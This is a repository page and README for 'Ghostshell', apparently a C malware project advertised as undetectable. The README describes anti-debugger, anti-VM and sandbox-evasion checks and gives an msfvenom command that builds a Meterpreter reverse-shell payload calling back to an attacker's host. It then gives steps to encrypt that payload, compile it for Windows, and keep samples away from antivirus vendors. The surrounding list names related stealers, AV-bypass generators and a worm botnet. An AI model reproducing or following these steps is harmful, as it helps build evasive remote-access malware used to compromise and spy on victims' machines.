
ReddyyZ / Ghostshell

Licence: MIT
Undetectable malware, with AV bypass techniques, anti-disassembly, etc.

Programming Languages

c
50402 projects - #5 most used programming language

Projects that are alternatives of or similar to Ghostshell

Green Hat Suite
Green-hat-suite is a tool to generate meterpreter/shell which could evade antivirus.
Stars: ✭ 112 (-61.77%)
Mutual labels:  malware, meterpreter
Python Rootkit
Python Remote Administration Tool (RAT) to gain meterpreter session
Stars: ✭ 358 (+22.18%)
Mutual labels:  malware, meterpreter
trolo
trolo - an easy-to-use script for generating payloads that bypass antivirus
Stars: ✭ 45 (-84.64%)
Mutual labels:  malware, meterpreter
Hercules
HERCULES is a special payload generator that can bypass antivirus software.
Stars: ✭ 526 (+79.52%)
Mutual labels:  malware, meterpreter
MsfMania
Python AV Evasion Tools
Stars: ✭ 388 (+32.42%)
Mutual labels:  malware, meterpreter
Community
Volatility plugins developed and maintained by the community
Stars: ✭ 252 (-13.99%)
Mutual labels:  malware
Php Malware Scanner
Scans PHP files for malware and known threats
Stars: ✭ 274 (-6.48%)
Mutual labels:  malware
Hack-Utils
Script to facilitate different functions and checks
Stars: ✭ 27 (-90.78%)
Mutual labels:  malware
Yobi
Yara Based Detection Engine for web browsers
Stars: ✭ 39 (-86.69%)
Mutual labels:  malware
Medusa
Binary instrumentation framework based on FRIDA
Stars: ✭ 258 (-11.95%)
Mutual labels:  malware
Nt wrapper
A wrapper library around native Windows system APIs
Stars: ✭ 287 (-2.05%)
Mutual labels:  malware
Crypter
Crypter - Python3 based builder and ransomware compiled to Windows executable using PyInstaller
Stars: ✭ 268 (-8.53%)
Mutual labels:  malware
Simpleator
Simpleator ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that leverages several new features that were added in Windows 10 Spring Update (1803), also called "Redstone 4", with additional improvements that were made in Windows 10 October Update (1809), aka "Redstone 5".
Stars: ✭ 260 (-11.26%)
Mutual labels:  malware
Egesploit
EGESPLOIT is a golang library for malware development
Stars: ✭ 275 (-6.14%)
Mutual labels:  meterpreter
TeleShadow2
TeleShadow - Telegram Desktop Session Stealer (Windows)
Stars: ✭ 88 (-69.97%)
Mutual labels:  malware
Adamantium Thief
🔑 Decrypt chromium based browsers passwords, cookies, credit cards, history, bookmarks, autofill. Version > 80 is supported.
Stars: ✭ 283 (-3.41%)
Mutual labels:  malware
M-Botnet
A C2 project that controls a self-propagating MS17-010 worm.
Stars: ✭ 39 (-86.69%)
Mutual labels:  malware
Al Khaser
Public malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection.
Stars: ✭ 3,573 (+1119.45%)
Mutual labels:  malware
Freki
🐺 Malware analysis platform
Stars: ✭ 285 (-2.73%)
Mutual labels:  malware
Infectpe
InfectPE - Inject custom code into PE file [This project is not maintained anymore]
Stars: ✭ 266 (-9.22%)
Mutual labels:  malware

GhostShell

This malware uses some techniques to try to bypass AVs, VMs, and sandboxes, with the sole purpose of learning more. I'm not responsible for your actions.


Bypass Techniques | Generating the Shellcode | How to compile for Windows on Linux | Credits | License

⚠️ Attention!!!

To check whether the antivirus detects the malware, NEVER send it to VirusTotal: IT WILL BE SENT TO THE ANTIVIRUS COMPANIES AND WILL BE BURNED. To analyze it, send it to https://www.hybrid-analysis.com/ and remember to check the option "Do not send my sample to non-affiliated third parties", as in the example below.

💣 Bypass Techniques

Anti-Debugger

To try to bypass debuggers, I'm using the "IsDebuggerPresent()" function from the "Windows.h" library to check whether a debugger is attached.

Anti-VM / Anti-Sandbox / Anti-AV

  • Enumerate Process Function

    Enumerates all processes running on the system and compares each one to the processes in the blacklist; if a running process matches any entry in the blacklist, it returns -1 (identified).

  • Sleep Acceleration Check Function

    First gets the current time and sleeps for 2 minutes, then gets the time again and compares the two; if the difference is less than 2, it returns -1 (identified).

  • Mac Address Check Function

    Gets the system MAC address and compares it to the MACs in the blacklist; if the system MAC address equals any MAC in the blacklist, it returns -1 (identified).

☢️ Generating the Shellcode

Generating

To generate the shellcode, type in the terminal: msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c, then copy the generated shellcode and encrypt it.

To encrypt the shellcode, use the encrypt_shellcode script.
On Linux, type: ./encrypt_shellcode e "(KEY, e.g. \xda\xe6\x1d\x5c\x9v\x8d)" "(SHELLCODE)"
On Windows, type: encrypt_shellcode.exe e "(KEY, e.g. \xda\xe6\x1d\x5c\x9v\x8d)" "(YOUR_SHELLCODE)"

💻 How to compile for Windows on Linux

To compile for Windows on Linux, first install mingw-w64: sudo apt-get install mingw-w64. Then, to compile for 32 bits: i686-w64-mingw32-gcc -o main.exe main.c -l psapi -static, and for 64 bits: x86_64-w64-mingw32-gcc -o main.exe main.c -l psapi -static

📖 Credits

Credits to https://github.com/rastating; encrypt_shellcode is based on a post on their github.io site: https://rastating.github.io/creating-a-shellcode-crypter/

📝 License

This project is under the MIT license. See LICENSE for more information.

> It is not ready yet!
